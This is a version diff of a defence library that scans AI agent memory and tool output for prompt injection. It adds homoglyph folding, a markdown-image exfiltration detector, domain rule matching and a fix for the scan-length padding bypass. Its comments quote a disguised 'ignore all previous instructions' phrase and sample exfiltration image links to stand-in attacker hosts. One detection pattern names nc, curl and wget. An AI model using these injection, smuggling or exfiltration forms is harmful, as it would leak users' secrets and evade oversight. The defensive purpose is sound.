shieldcortex 4.31.1 → 4.32.0

package/dist/defence/credential-leak/patterns.js

@@ -357,3 +357,24 @@ export const ALL_CREDENTIAL_PATTERNS = [
     ...GENERIC_SECRET_PATTERNS,
     ...ENV_SECRET_PATTERNS,
 ];
+// ── Single Source of Truth — pattern lookup by name (Phase 17 C3) ──
+/** Index of every credential pattern by its `name`, for cross-module reuse. */
+const PATTERNS_BY_NAME = new Map(ALL_CREDENTIAL_PATTERNS.map((p) => [p.name, p]));
+/**
+ * Fetch specific credential pattern SOURCES by name from the single source of
+ * truth. Lets other detectors (e.g. fragmentation entity extraction) reuse the
+ * canonical token regexes instead of maintaining their own divergent copies —
+ * WITHOUT pulling in the broad/low-confidence heuristics, so detection scope is
+ * unchanged. Throws on an unknown name so a rename can never silently drop a
+ * provider.
+ */
+export function getCredentialRegexesByName(names) {
+    return names.map((name) => {
+        const pattern = PATTERNS_BY_NAME.get(name);
+        if (!pattern) {
+            throw new Error(`Unknown credential pattern name: "${name}"`);
+        }
+        // Fresh RegExp so callers don't share lastIndex state with the source.
+        return new RegExp(pattern.regex.source, pattern.regex.flags);
+    });
+}

package/dist/defence/custom-patterns/store.js

@@ -2,6 +2,13 @@
  * SQLite CRUD for custom injection patterns (Pro feature).
  */
 import { getDatabase } from '../../database/init.js';
+import { createRequire } from 'module';
+// safe-regex2 is require()d lazily (it may not be installed) behind a
+// try/catch fallback. Under real Node ESM a bare require() throws
+// ReferenceError, which the catch would swallow — quietly downgrading the
+// ReDoS check to the weaker heuristic. createRequire() gives us a working
+// require here.
+const require = createRequire(import.meta.url);
 const MAX_PATTERNS = 50;
 const MAX_REGEX_LENGTH = 500;
 /**
@@ -23,7 +30,7 @@ export function validateRegex(pattern) {
     }
     // ReDoS check via safe-regex2
     try {
-        // Dynamic import fallback — safe-regex2 may not be installed
+        // Load the CommonJS safe-regex2 via createRequire (it may not be installed)
         // eslint-disable-next-line @typescript-eslint/no-require-imports
         const safe = require('safe-regex2');
         if (!safe(pattern)) {

package/dist/defence/custom-rules/store.d.ts

@@ -36,3 +36,21 @@ export declare function deleteFirewallRule(id: number): boolean;
  * Get all enabled rules sorted by priority (used by the defence pipeline).
  */
 export declare function getEnabledFirewallRules(): FirewallRule[];
+/**
+ * Evaluate a single firewall rule against candidate text(s), honouring the
+ * rule's `condition_type`. This is the single source of truth for rule
+ * matching — the defence pipeline calls it for every enabled rule.
+ *
+ * - `keyword`: case-insensitive LITERAL substring match. Regex metacharacters
+ *   in the value (`a.b`, `x+y`) are treated literally, not as a pattern.
+ * - `domain`: the value is matched as a host/domain. It matches when the value
+ *   appears as a hostname (or a suffix of one, so `evil.com` matches
+ *   `api.evil.com`) anywhere in the text, including inside a URL.
+ * - `regex` (and any unknown type): compiled as a case-insensitive RegExp.
+ *   Invalid patterns never match (returns false) rather than throwing.
+ *
+ * `condition_value` is assumed to have already been vetted by safe-regex2 at
+ * creation time for regex rules (see createFirewallRule callers); we still
+ * guard compilation here so a malformed stored value can't crash the pipeline.
+ */
+export declare function ruleMatches(rule: Pick<FirewallRule, 'condition_type' | 'condition_value'>, ...texts: Array<string | undefined | null>): boolean;

package/dist/defence/custom-rules/store.js

@@ -58,3 +58,66 @@ export function getEnabledFirewallRules() {
     const db = getDatabase();
     return db.prepare('SELECT * FROM firewall_rules WHERE enabled = 1 ORDER BY priority ASC').all();
 }
+/**
+ * Evaluate a single firewall rule against candidate text(s), honouring the
+ * rule's `condition_type`. This is the single source of truth for rule
+ * matching — the defence pipeline calls it for every enabled rule.
+ *
+ * - `keyword`: case-insensitive LITERAL substring match. Regex metacharacters
+ *   in the value (`a.b`, `x+y`) are treated literally, not as a pattern.
+ * - `domain`: the value is matched as a host/domain. It matches when the value
+ *   appears as a hostname (or a suffix of one, so `evil.com` matches
+ *   `api.evil.com`) anywhere in the text, including inside a URL.
+ * - `regex` (and any unknown type): compiled as a case-insensitive RegExp.
+ *   Invalid patterns never match (returns false) rather than throwing.
+ *
+ * `condition_value` is assumed to have already been vetted by safe-regex2 at
+ * creation time for regex rules (see createFirewallRule callers); we still
+ * guard compilation here so a malformed stored value can't crash the pipeline.
+ */
+export function ruleMatches(rule, ...texts) {
+    const value = rule.condition_value;
+    if (!value)
+        return false;
+    const candidates = texts.filter((t) => typeof t === 'string' && t.length > 0);
+    if (candidates.length === 0)
+        return false;
+    const type = (rule.condition_type || 'regex').toLowerCase();
+    if (type === 'keyword') {
+        const needle = value.toLowerCase();
+        return candidates.some((text) => text.toLowerCase().includes(needle));
+    }
+    if (type === 'domain') {
+        return candidates.some((text) => textContainsDomain(text, value));
+    }
+    // regex (default): compile case-insensitively; a bad pattern never matches.
+    let regex;
+    try {
+        regex = new RegExp(value, 'i');
+    }
+    catch {
+        return false;
+    }
+    return candidates.some((text) => regex.test(text));
+}
+/**
+ * True when `domain` appears as a host (or a parent suffix of a host) in the
+ * given text. We extract hostname-shaped tokens from the text and compare each
+ * against the configured domain with proper label-boundary semantics:
+ *   - exact match: `evil.com` matches host `evil.com`
+ *   - subdomain match: `evil.com` matches host `api.evil.com`
+ *   - NOT a partial-label match: `evil.com` does NOT match `notevil.com`
+ */
+function textContainsDomain(text, domain) {
+    const target = domain.trim().toLowerCase().replace(/^\.+|\.+$/g, '');
+    if (!target)
+        return false;
+    // Pull out hostname-shaped tokens (URL hosts, bare hosts, emails-after-@).
+    // A host is dot-separated labels of [a-z0-9-], at least two labels long, or
+    // the exact target itself.
+    const hostRegex = /[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+/gi;
+    const matches = text.toLowerCase().match(hostRegex);
+    if (!matches)
+        return false;
+    return matches.some((host) => host === target || host.endsWith(`.${target}`));
+}

package/dist/defence/firewall/confusables.d.ts

@@ -0,0 +1,30 @@
+/**
+ * Unicode Confusable Folding
+ *
+ * Cross-script homoglyph attacks swap a single Latin letter for an
+ * identical-looking glyph from another script (e.g. Cyrillic `е` U+0435 for
+ * Latin `e`), so `ignorе all previous instructions` reads as English but never
+ * matches an ASCII regex. `foldConfusables` normalises such text back to its
+ * Latin skeleton so the instruction detector can match the real intent.
+ *
+ * Two stages:
+ *   1. NFKC normalisation — folds fullwidth forms, many mathematical
+ *      alphanumerics, ligatures, etc. down to their ASCII compatibility forms.
+ *   2. A curated cross-script lookalike table — the high-frequency Cyrillic and
+ *      Greek glyphs that NFKC does NOT touch (NFKC preserves script identity for
+ *      these). This is deliberately NOT exhaustive: it targets the glyphs that
+ *      actually show up in homoglyph injection attacks, not the full Unicode
+ *      confusables database.
+ */
+/**
+ * Fold a string to its Latin skeleton: NFKC first, then map curated
+ * cross-script confusables to their Latin lookalikes.
+ */
+export declare function foldConfusables(s: string): string;
+/**
+ * True when a cross-script confusable substitution changed something beyond
+ * what plain NFKC normalisation does — i.e. one of the curated Cyrillic/Greek
+ * glyphs was present and got folded to a different Latin letter. Genuine
+ * NFKC-only changes (fullwidth, ligatures) do NOT count.
+ */
+export declare function hasConfusables(s: string): boolean;

package/dist/defence/firewall/confusables.js

@@ -0,0 +1,87 @@
+/**
+ * Unicode Confusable Folding
+ *
+ * Cross-script homoglyph attacks swap a single Latin letter for an
+ * identical-looking glyph from another script (e.g. Cyrillic `е` U+0435 for
+ * Latin `e`), so `ignorе all previous instructions` reads as English but never
+ * matches an ASCII regex. `foldConfusables` normalises such text back to its
+ * Latin skeleton so the instruction detector can match the real intent.
+ *
+ * Two stages:
+ *   1. NFKC normalisation — folds fullwidth forms, many mathematical
+ *      alphanumerics, ligatures, etc. down to their ASCII compatibility forms.
+ *   2. A curated cross-script lookalike table — the high-frequency Cyrillic and
+ *      Greek glyphs that NFKC does NOT touch (NFKC preserves script identity for
+ *      these). This is deliberately NOT exhaustive: it targets the glyphs that
+ *      actually show up in homoglyph injection attacks, not the full Unicode
+ *      confusables database.
+ */
+// Cyrillic → Latin. The lowercase codepoints here are the same set used by
+// CYRILLIC_HOMOGLYPHS in encoding-detector.ts (the run that already drives the
+// homoglyph flag); the uppercase set extends it for capitalised attack text.
+const CYRILLIC_TO_LATIN = {
+    'а': 'a', // а
+    'е': 'e', // е
+    'о': 'o', // о
+    'р': 'p', // р
+    'с': 'c', // с
+    'у': 'y', // у
+    'х': 'x', // х
+    'А': 'A', // А
+    'В': 'B', // В
+    'Е': 'E', // Е
+    'К': 'K', // К
+    'М': 'M', // М
+    'Н': 'H', // Н
+    'О': 'O', // О
+    'Р': 'P', // Р
+    'С': 'C', // С
+    'Т': 'T', // Т
+    'У': 'Y', // У
+    'Х': 'X', // Х
+};
+// Greek → Latin. Only the high-frequency lookalikes; lowercase Greek mostly
+// does not resemble Latin (α/β/γ are distinct) so we cover lowercase omicron
+// plus the capital letters that are visually identical to Latin capitals.
+const GREEK_TO_LATIN = {
+    'ο': 'o', // ο  lowercase omicron
+    'Α': 'A', // Α
+    'Β': 'B', // Β
+    'Ε': 'E', // Ε
+    'Ζ': 'Z', // Ζ
+    'Η': 'H', // Η
+    'Ι': 'I', // Ι
+    'Κ': 'K', // Κ
+    'Μ': 'M', // Μ
+    'Ν': 'N', // Ν
+    'Ο': 'O', // Ο
+    'Ρ': 'P', // Ρ
+    'Τ': 'T', // Τ
+    'Υ': 'Y', // Υ
+    'Χ': 'X', // Χ
+};
+const CONFUSABLE_MAP = {
+    ...CYRILLIC_TO_LATIN,
+    ...GREEK_TO_LATIN,
+};
+/**
+ * Fold a string to its Latin skeleton: NFKC first, then map curated
+ * cross-script confusables to their Latin lookalikes.
+ */
+export function foldConfusables(s) {
+    const normalised = s.normalize('NFKC');
+    let out = '';
+    for (const ch of normalised) {
+        out += CONFUSABLE_MAP[ch] ?? ch;
+    }
+    return out;
+}
+/**
+ * True when a cross-script confusable substitution changed something beyond
+ * what plain NFKC normalisation does — i.e. one of the curated Cyrillic/Greek
+ * glyphs was present and got folded to a different Latin letter. Genuine
+ * NFKC-only changes (fullwidth, ligatures) do NOT count.
+ */
+export function hasConfusables(s) {
+    return foldConfusables(s) !== s.normalize('NFKC');
+}

package/dist/defence/firewall/encoding-detector.js

@@ -4,18 +4,22 @@
  * Detects obfuscation attempts including base64, unicode tricks,
  * hex encoding, suspicious URL encoding, and invisible characters.
  */
+import { hasConfusables } from './confusables.js';
 // Base64: at least 20 chars of base64 alphabet, optionally padded
 const BASE64_PATTERN = /(?:[A-Za-z0-9+/]{4}){5,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?/g;
 // Hex sequences
 const HEX_PATTERN = /(?:0x[0-9a-fA-F]{2}\s*){4,}|(?:\\x[0-9a-fA-F]{2}){4,}|\b[0-9a-fA-F]{20,}\b/g;
 // Suspicious URL encoding (4+ encoded chars in sequence)
 const URL_ENCODING_PATTERN = /(?:%[0-9A-Fa-f]{2}){4,}/g;
-// Zero-width characters
-const ZERO_WIDTH_PATTERN = /[\u200B\u200C\u200D\uFEFF]/g;
-// RTL override
-const RTL_OVERRIDE_PATTERN = /\u202E/g;
-// Unicode homoglyphs — Cyrillic characters that look like Latin
-const CYRILLIC_HOMOGLYPHS = /[\u0430\u0435\u043E\u0440\u0441\u0443\u0445\u0410\u0412\u0415\u041A\u041C\u041D\u041E\u0420\u0421\u0422\u0423\u0425]/g;
+// Zero-width characters.
+// NOTE: presence check only (used with `.test()`), so NO `/g` flag \u2014 a stateful
+// `/g` regex advances `lastIndex` across `.test()` calls and flip-flops between
+// true/false for identical content, silently missing zero-width smuggling.
+const ZERO_WIDTH_PATTERN = /[\u200B\u200C\u200D\uFEFF]/;
+// RTL override \u2014 presence check only, NO `/g` (same stateful-test hazard).
+const RTL_OVERRIDE_PATTERN = /\u202E/;
+// ASCII Latin letters — used by the mixed-script homoglyph signal below.
+const ASCII_LATIN = /[A-Za-z]/;
 function tryBase64DecodeSingle(str) {
     try {
         const decoded = Buffer.from(str, 'base64').toString('utf-8');
@@ -121,9 +125,19 @@ export function detectEncoding(content) {
     if (RTL_OVERRIDE_PATTERN.test(content)) {
         encodingTypes.push('rtl_override');
     }
-    // Unicode homoglyphs
-    const homoglyphMatches = content.match(CYRILLIC_HOMOGLYPHS);
-    if (homoglyphMatches && homoglyphMatches.length >= 2) {
+    // Unicode homoglyphs — mixed-script signal.
+    //
+    // The old rule ("≥2 Cyrillic confusables") missed a single substitution
+    // (`ignorе` with one Cyrillic е reads as Latin and slipped through). The new
+    // rule flags 'unicode_homoglyph' when BOTH are true:
+    //   1. a curated cross-script confusable is present (hasConfusables — folding
+    //      changed something beyond plain NFKC), AND
+    //   2. the content also contains an ASCII Latin letter.
+    // That combination means a Latin word has a foreign lookalike hidden in it.
+    // A wholly-Cyrillic Russian sentence has NO ASCII Latin letters, so it does
+    // NOT flag — genuine non-Latin text is left alone. Covers the Cyrillic AND
+    // Greek glyphs in the confusables map (a single substitution is enough).
+    if (hasConfusables(content) && ASCII_LATIN.test(content)) {
         encodingTypes.push('unicode_homoglyph');
     }
     return {

package/dist/defence/firewall/index.d.ts

@@ -7,14 +7,24 @@
  * firewall analysis result.
  */
 import type { FirewallAnalysis, DefenceSource, DefenceConfig } from '../types.js';
+import type { SanitisationCategory } from '../input-sanitisation/index.js';
 export { detectInstructions } from './instruction-detector.js';
 export type { InstructionDetectionResult } from './instruction-detector.js';
 export { detectPrivilegeEscalation } from './privilege-detector.js';
 export type { PrivilegeDetectionResult } from './privilege-detector.js';
 export { detectEncoding } from './encoding-detector.js';
 export type { EncodingDetectionResult } from './encoding-detector.js';
+export { detectMarkdownImageExfil } from './markdown-image-detector.js';
+export type { MarkdownImageExfilResult } from './markdown-image-detector.js';
 export { scoreAnomaly } from './anomaly-scorer.js';
 /**
  * Run the full firewall analysis pipeline on memory content.
  */
-export declare function analyzeFirewall(content: string, title: string, source: DefenceSource, trustScore: number, config: DefenceConfig): FirewallAnalysis;
+export declare function analyzeFirewall(content: string, title: string, source: DefenceSource, trustScore: number, config: DefenceConfig, 
+/**
+ * Categories stripped by Layer 1 sanitisation BEFORE this content arrived.
+ * The sanitiser removes zero-width/bidi bytes, so the encoding detector below
+ * never sees them — feeding the strip signal back in lets the verdict reflect
+ * the smuggling attempt instead of silently allowing the cleaned content.
+ */
+preSanitisationStrips?: SanitisationCategory[]): FirewallAnalysis;

package/dist/defence/firewall/index.js

@@ -9,6 +9,7 @@
 import { detectInstructions } from './instruction-detector.js';
 import { detectPrivilegeEscalation } from './privilege-detector.js';
 import { detectEncoding } from './encoding-detector.js';
+import { detectMarkdownImageExfil } from './markdown-image-detector.js';
 import { scoreAnomaly } from './anomaly-scorer.js';
 import { detectSkillThreats } from '../skill-scanner/patterns.js';
 import { scanForCredentials } from '../credential-leak/index.js';
@@ -16,15 +17,39 @@ import { scanForCredentials } from '../credential-leak/index.js';
 export { detectInstructions } from './instruction-detector.js';
 export { detectPrivilegeEscalation } from './privilege-detector.js';
 export { detectEncoding } from './encoding-detector.js';
+export { detectMarkdownImageExfil } from './markdown-image-detector.js';
 export { scoreAnomaly } from './anomaly-scorer.js';
 /**
  * Run the full firewall analysis pipeline on memory content.
  */
-export function analyzeFirewall(content, title, source, trustScore, config) {
+export function analyzeFirewall(content, title, source, trustScore, config, 
+/**
+ * Categories stripped by Layer 1 sanitisation BEFORE this content arrived.
+ * The sanitiser removes zero-width/bidi bytes, so the encoding detector below
+ * never sees them — feeding the strip signal back in lets the verdict reflect
+ * the smuggling attempt instead of silently allowing the cleaned content.
+ */
+preSanitisationStrips) {
     const instructions = detectInstructions(content);
     const privilege = detectPrivilegeEscalation(content);
     const encoding = detectEncoding(content);
+    const markdownImage = detectMarkdownImageExfil(content);
     const anomaly = scoreAnomaly(content, title);
+    // Fold pre-sanitisation zero-width/bidi strips into the encoding signal so
+    // determineResult escalates (quarantine in balanced, block in strict). We map
+    // them onto the SAME encodingTypes the detector emits ('zero_width_chars' /
+    // 'rtl_override') so the existing "suspicious encoding → quarantine" rule and
+    // the strict-mode detection count both fire without any extra branches.
+    if (preSanitisationStrips?.includes('zero_width') &&
+        !encoding.encodingTypes.includes('zero_width_chars')) {
+        encoding.encodingTypes.push('zero_width_chars');
+        encoding.detected = true;
+    }
+    if (preSanitisationStrips?.includes('bidi_override') &&
+        !encoding.encodingTypes.includes('rtl_override')) {
+        encoding.encodingTypes.push('rtl_override');
+        encoding.detected = true;
+    }
     // Skill scanner patterns — catches tool injection, scope escalation,
     // data exfiltration, persistence, supply chain, agent manipulation,
     // and stealth instructions in memory content (not just skill files).
@@ -53,6 +78,14 @@ export function analyzeFirewall(content, title, source, trustScore, config) {
         threatIndicators.push('encoding_obfuscation');
         blockedPatterns.push(...encoding.encodingTypes);
     }
+    // Markdown-image exfiltration — a rendered image URL that smuggles data to an
+    // attacker. Reported as external_url so determineResult treats it the same as
+    // any other off-host link: low-severity alone, but it escalates the verdict
+    // when it co-occurs with another detection (encoding combined with >=2, etc.).
+    if (markdownImage.detected && !threatIndicators.includes('external_url')) {
+        threatIndicators.push('external_url');
+        blockedPatterns.push('markdown_image_exfil');
+    }
     // Skill-level threats in memory content (tool injection, scope escalation, etc.)
     if (skillThreats.detected) {
         for (const threat of skillThreats.threats) {

package/dist/defence/firewall/instruction-detector.js

@@ -3,6 +3,8 @@
  *
  * Detects prompt injection and hidden instruction patterns in memory content.
  */
+import { foldConfusables } from './confusables.js';
+import { someWindow } from '../scan-windows.js';
 const PATTERN_GROUPS = [
     {
         name: 'system_prompt_marker',
@@ -141,23 +143,32 @@ const PATTERN_GROUPS = [
         ],
     },
 ];
-// Maximum content length to scan (prevents ReDOS on very long inputs)
-const MAX_SCAN_LENGTH = 50000;
 /**
- * Safely test a regex against content with length limit
+ * Safely test a regex against content.
+ *
+ * Scans the WHOLE input as overlapping windows (<= SCAN_WINDOW_SIZE chars each)
+ * rather than truncating to the first 50KB. Each window keeps the per-regex work
+ * bounded (preserving the ReDoS guarantee the old truncation gave us) while the
+ * overlap means a payload buried past 50KB of filler is still tested — closing
+ * the >50KB padding bypass.
  */
 function safeRegexTest(pattern, text) {
-    // Truncate to prevent potential ReDOS on extremely long inputs
-    const truncated = text.length > MAX_SCAN_LENGTH ? text.slice(0, MAX_SCAN_LENGTH) : text;
-    return pattern.test(truncated);
+    return someWindow(text, (window) => pattern.test(window));
 }
 export function detectInstructions(content) {
     const matchedPatterns = [];
     let totalWeight = 0;
     let maxWeight = 0;
+    // Fold cross-script confusables (Cyrillic/Greek homoglyphs + NFKC forms) to
+    // their Latin skeleton so a single-glyph substitution like `ignorе` (Cyrillic
+    // е) still matches the ASCII patterns. We test the original first, then the
+    // folded copy only if folding changed something — testing both means we never
+    // *lose* a match that the original would have caught.
+    const folded = foldConfusables(content);
+    const variants = folded !== content ? [content, folded] : [content];
     for (const group of PATTERN_GROUPS) {
         for (const pattern of group.patterns) {
-            if (safeRegexTest(pattern, content)) {
+            if (variants.some((variant) => safeRegexTest(pattern, variant))) {
                 matchedPatterns.push(group.name);
                 totalWeight += group.weight;
                 if (group.weight > maxWeight) {

package/dist/defence/firewall/markdown-image-detector.d.ts

@@ -0,0 +1,34 @@
+/**
+ * Markdown-Image Exfiltration Detector
+ *
+ * A classic tool-output / agent-memory exfiltration vector is a markdown image
+ * whose URL silently smuggles data to an attacker the moment a client renders
+ * it (no click required):
+ *
+ *   ![x](https://evil.example/log?d=<secrets>)
+ *   ![](http://attacker.test/${data})
+ *
+ * This detector flags markdown image syntax `![alt](URL)` where the URL is an
+ * http(s) link that LOOKS like a data-exfiltration sink. It is deliberately
+ * conservative — a plain `![logo](https://example.com/logo.png)` must NOT trip
+ * it — so a URL only flags when one of these holds:
+ *
+ *   1. it carries a query string whose value(s) look like smuggled data:
+ *      long (>= EXFIL_VALUE_MIN_LEN chars) and/or base64-ish/percent-encoded; OR
+ *   2. it contains an unresolved template placeholder (`${...}` / `{{...}}`),
+ *      which only appears when an injection is trying to interpolate captured
+ *      data into the URL.
+ *
+ * Pure presence of a query string is NOT enough (analytics/CDN links routinely
+ * have `?v=2&w=400`); the value has to look like a payload. This keeps the false
+ * positive rate low while catching the real exfil shape.
+ */
+export interface MarkdownImageExfilResult {
+    detected: boolean;
+    /** The offending image URLs (capped), for reporting. */
+    urls: string[];
+}
+/**
+ * Scan content for markdown-image exfiltration links.
+ */
+export declare function detectMarkdownImageExfil(content: string): MarkdownImageExfilResult;

package/dist/defence/firewall/markdown-image-detector.js

@@ -0,0 +1,83 @@
+/**
+ * Markdown-Image Exfiltration Detector
+ *
+ * A classic tool-output / agent-memory exfiltration vector is a markdown image
+ * whose URL silently smuggles data to an attacker the moment a client renders
+ * it (no click required):
+ *
+ *   ![x](https://evil.example/log?d=<secrets>)
+ *   ![](http://attacker.test/${data})
+ *
+ * This detector flags markdown image syntax `![alt](URL)` where the URL is an
+ * http(s) link that LOOKS like a data-exfiltration sink. It is deliberately
+ * conservative — a plain `![logo](https://example.com/logo.png)` must NOT trip
+ * it — so a URL only flags when one of these holds:
+ *
+ *   1. it carries a query string whose value(s) look like smuggled data:
+ *      long (>= EXFIL_VALUE_MIN_LEN chars) and/or base64-ish/percent-encoded; OR
+ *   2. it contains an unresolved template placeholder (`${...}` / `{{...}}`),
+ *      which only appears when an injection is trying to interpolate captured
+ *      data into the URL.
+ *
+ * Pure presence of a query string is NOT enough (analytics/CDN links routinely
+ * have `?v=2&w=400`); the value has to look like a payload. This keeps the false
+ * positive rate low while catching the real exfil shape.
+ */
+// Markdown image: ![alt](URL). URL captured up to the closing paren / whitespace.
+// Length-capped on alt + URL to keep the regex ReDoS-safe.
+const MARKDOWN_IMAGE_PATTERN = /!\[[^\]]{0,200}\]\((https?:\/\/[^)\s]{1,2000})\)/gi;
+// A query value that looks like smuggled data: long opaque token, base64-ish,
+// or percent-encoded run.
+const EXFIL_VALUE_MIN_LEN = 24;
+const BASEISH_VALUE = /^[A-Za-z0-9+/_=-]{16,}$/;
+const PERCENT_RUN = /(?:%[0-9A-Fa-f]{2}){3,}/;
+// Unresolved template interpolation in a URL — never legitimate in a static link.
+const TEMPLATE_PLACEHOLDER = /\$\{[^}]*\}|\{\{[^}]*\}\}/;
+/**
+ * True if an image URL's query string carries values that look like exfiltrated
+ * data, or if the URL contains an unresolved template placeholder.
+ */
+function urlLooksLikeExfil(rawUrl) {
+    if (TEMPLATE_PLACEHOLDER.test(rawUrl))
+        return true;
+    const qIndex = rawUrl.indexOf('?');
+    if (qIndex === -1)
+        return false;
+    const query = rawUrl.slice(qIndex + 1);
+    if (!query)
+        return false;
+    // Inspect each key=value pair; flag if any value looks like a payload.
+    for (const pair of query.split('&')) {
+        const eq = pair.indexOf('=');
+        const value = eq === -1 ? pair : pair.slice(eq + 1);
+        if (!value)
+            continue;
+        if (value.length >= EXFIL_VALUE_MIN_LEN)
+            return true;
+        if (BASEISH_VALUE.test(value) && value.length >= 16)
+            return true;
+        if (PERCENT_RUN.test(value))
+            return true;
+    }
+    return false;
+}
+/**
+ * Scan content for markdown-image exfiltration links.
+ */
+export function detectMarkdownImageExfil(content) {
+    const urls = [];
+    MARKDOWN_IMAGE_PATTERN.lastIndex = 0;
+    let match;
+    while ((match = MARKDOWN_IMAGE_PATTERN.exec(content)) !== null) {
+        const url = match[1];
+        if (urlLooksLikeExfil(url)) {
+            urls.push(url.slice(0, 200));
+            if (urls.length >= 10)
+                break;
+        }
+    }
+    return {
+        detected: urls.length > 0,
+        urls,
+    };
+}

package/dist/defence/fragmentation/entity-extractor.js

@@ -5,15 +5,26 @@
  * that could be fragments of a larger attack payload.
  */
 import { getDatabase } from '../../database/init.js';
+import { getCredentialRegexesByName } from '../credential-leak/patterns.js';
 // ── Regex patterns ──
 const URL_PATTERN = /https?:\/\/[^\s"'<>)\]]+/gi;
+// Token-shaped provider regexes are sourced from the single source of truth
+// (credential-leak/patterns.ts) rather than re-declared here, so there is ONE
+// definition of "what an OpenAI / AWS / GitHub key looks like" across the
+// codebase (Phase 17 C3). We pull only the specific prefixed-token providers
+// this extractor already matched — NOT the broad/low-confidence heuristics
+// (bare 32-hex, UUID) — so the set of tokens classified as `api_key` is
+// unchanged. GitLab + the broad Slack-variant matcher have no canonical
+// equivalent, so they stay defined locally (different scope).
 const API_KEY_PATTERNS = [
-    /sk-[A-Za-z0-9]{20,}/g, // OpenAI-style
-    /AKIA[A-Z0-9]{16}/g, // AWS access key
-    /ghp_[A-Za-z0-9]{36,}/g, // GitHub PAT
-    /gho_[A-Za-z0-9]{36,}/g, // GitHub OAuth
-    /glpat-[A-Za-z0-9\-_]{20,}/g, // GitLab PAT
-    /xox[bposa]-[A-Za-z0-9\-]+/g, // Slack tokens
+    ...getCredentialRegexesByName([
+        'OpenAI API Key', // sk-...
+        'AWS Access Key ID', // AKIA...
+        'GitHub Personal Access Token', // ghp_...
+        'GitHub OAuth Token', // gho_...
+    ]),
+    /glpat-[A-Za-z0-9\-_]{20,}/g, // GitLab PAT (no canonical equivalent)
+    /xox[bposa]-[A-Za-z0-9\-]+/g, // Slack tokens (broader than canonical xoxb rule)
 ];
 const CREDENTIAL_PATTERN = /(?:token|password|secret|key|auth)[=:\s]+["']?([A-Za-z0-9_\-]{20,})["']?/gi;
 const COMMAND_PATTERNS = /(?:^|\s)((?:curl|wget|ssh|scp|rsync|chmod|chown|rm|sudo|apt|yum|pip|npm|docker|kubectl|nc|ncat|bash|sh|python|perl|ruby|eval|exec)\s+[^\n]{3,})/gim;

package/dist/defence/index.d.ts

@@ -10,11 +10,16 @@ export { scoreSource, filterByTrust } from './trust/index.js';
 export { analyzeFirewall } from './firewall/index.js';
 export { classifySensitivity, redactContent, redactForDisplay } from './sensitivity/index.js';
 export { analyzeFragmentation, storeFragmentationData } from './fragmentation/index.js';
+export { analyzeSemanticSimilarity, SEMANTIC_SIMILARITY_THRESHOLD } from './semantic/index.js';
+export type { SemanticAnalysisResult, Embedder } from './semantic/index.js';
+export { ATTACK_CORPUS } from './semantic/attack-corpus.js';
 export { scanForCredentials, redactCredentials, DEFAULT_CREDENTIAL_CONFIG } from './credential-leak/index.js';
 export type { CredentialScanResult, CredentialFinding, CredentialDetectionConfig, CredentialType, CredentialSeverity } from './credential-leak/index.js';
 export { logAudit, queryAuditLogs, getAuditStats } from './audit/index.js';
 export { scanSkill, scanSkillContent, discoverSkillFiles, detectFormat, detectFormatFromContent, parseSkillFile, readSkillFile } from './skill-scanner/index.js';
 export type { SkillScanResult, SkillScanOptions, SkillThreatFinding, ParsedSkill, SkillFormat } from './skill-scanner/index.js';
+export { scanToolResponse, shouldScanToolResponse } from './tool-response-scanner.js';
+export type { ToolResponseScanResult } from './types.js';
 export { activateIronDome, deactivateIronDome, getIronDomeStatus, isChannelTrusted, isActionAllowed, scanForInjection, checkPII, handleKillPhrase, IRON_DOME_PROFILES, DEFAULT_IRON_DOME_CONFIG, } from './iron-dome/index.js';
 export type { IronDomeConfig, IronDomeProfile, InjectionScanResult, InjectionDetection, InjectionSeverity, InjectionCategory, GatewayResult, ActionGateResult, ActionDecision, PiiCheckResult, PiiViolation, KillSwitchResult, } from './iron-dome/index.js';
 export { getCloudConfig, setCloudConfig, clearCloudConfigCache, getTrustedSkills, addTrustedSkill, removeTrustedSkill, getDeviceId, getDeviceName, getDefenceMode, setDefenceMode, isConfigTampered, getVerifyConfig, setVerifyConfig, getOpenClawAutoMemory, setOpenClawAutoMemory, getOpenClawMemoryConfig, setOpenClawMemoryConfig } from '../cloud/config.js';

package/dist/defence/index.js

@@ -15,12 +15,20 @@ export { analyzeFirewall } from './firewall/index.js';
 export { classifySensitivity, redactContent, redactForDisplay } from './sensitivity/index.js';
 // Fragmentation
 export { analyzeFragmentation, storeFragmentationData } from './fragmentation/index.js';
+// Semantic Analysis (Layer 3 — async/deep-scan path only; degrades gracefully)
+export { analyzeSemanticSimilarity, SEMANTIC_SIMILARITY_THRESHOLD } from './semantic/index.js';
+export { ATTACK_CORPUS } from './semantic/attack-corpus.js';
 // Credential Leak Detection (Layer 6)
 export { scanForCredentials, redactCredentials, DEFAULT_CREDENTIAL_CONFIG } from './credential-leak/index.js';
 // Audit
 export { logAudit, queryAuditLogs, getAuditStats } from './audit/index.js';
 // Skill Scanner
 export { scanSkill, scanSkillContent, discoverSkillFiles, detectFormat, detectFormatFromContent, parseSkillFile, readSkillFile } from './skill-scanner/index.js';
+// Tool Response Scanner (read-path scan; pure, no DB handle required —
+// the audit write is guarded by isDatabaseInitialized()). Exposed here so the
+// OpenClaw realtime plugin can scan in-process instead of shelling out to the
+// MCP server per message.
+export { scanToolResponse, shouldScanToolResponse } from './tool-response-scanner.js';
 // Iron Dome — Behaviour Protection Layer
 export { activateIronDome, deactivateIronDome, getIronDomeStatus, isChannelTrusted, isActionAllowed, scanForInjection, checkPII, handleKillPhrase, IRON_DOME_PROFILES, DEFAULT_IRON_DOME_CONFIG, } from './iron-dome/index.js';
 // Cloud